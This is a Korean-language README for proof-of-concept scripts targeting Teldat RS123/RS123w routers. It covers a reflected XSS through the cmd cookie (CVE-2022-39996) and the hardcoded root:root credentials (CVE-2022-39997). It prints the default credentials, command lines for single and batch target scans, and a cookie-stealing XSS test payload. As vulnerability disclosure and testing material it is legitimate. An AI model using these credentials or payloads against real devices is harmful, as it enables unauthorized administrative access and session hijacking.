
Teldat RS123/RS123w 라우터의 CVE-2022-39996 (반사형 XSS) 및 CVE-2022-39997 (취약한 비밀번호)에 대한 PoC
Teldat RS123 / RS123w 라우터에서 발견된 두 가지 취약점에 대한 개념 증명(PoC)입니다.
| CVE ID | 유형 | CWE | CVSS | 심각도 |
|---|---|---|---|---|
| CVE-2022-39996 | 반사형 XSS | CWE-79 | 6.1 | 중간 |
| CVE-2022-39997 | 약한 암호 | CWE-521 | 9.8 | 심각 |
영향 받는 제품: Teldat RS123, RS123w 라우터
Teldat RS123/RS123w 라우터는 하드코딩된 기본 자격 증명 root:root와 함께 제공됩니다. 관리자는 이를 변경하지 않고 두는 경우가 많아, 인증되지 않은 공격자가 Telnet, SSH, HTTP 또는 기타 서비스를 통해 전체 관리자 액세스 권한을 얻을 수 있습니다.
Account: root
Password: root

pip install requests paramiko
# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1
# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all
# Batch scan
python CVE-2022-39997.py -f targets.txt
/upgrade/index.html 엔드포인트는 cmd HTTP 쿠키 값을 응답에 삭제 없이 반사합니다. 공격자는 cmd 쿠키에 JavaScript가 포함된 악의적인 요청을 조작할 수 있습니다. 인증된 관리자가 해당 페이지를 방문하면 스크립트가 라우터 웹 인터페이스의 브라우저 컨텍스트에서 실행되어 세션 하이재킹이나 구성 조작이 가능해집니다.
cmd 쿠키에 XSS 페이로드 구성:

pip install requests
# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1
# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root
# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi
# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc
# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"
| 파일 | 설명 |
|---|---|
CVE-2022-39997.py | 약한 암호 탐지 (Telnet / SSH / HTTP / FTP) |
CVE-2022-39996.py | cmd 쿠키를 통한 반사형 XSS 탐지 |
Teldat's Router Vulnerability.md | 전체 취약점 공개 보고서 |
이 POC 스크립트는 교육 목적 및 승인된 보안 테스트 전용입니다. 소유하지 않거나 테스트할 명시적 권한이 없는 시스템에 사용하지 마십시오. 작성자는 오용이나 손해에 대해 책임을 지지 않습니다.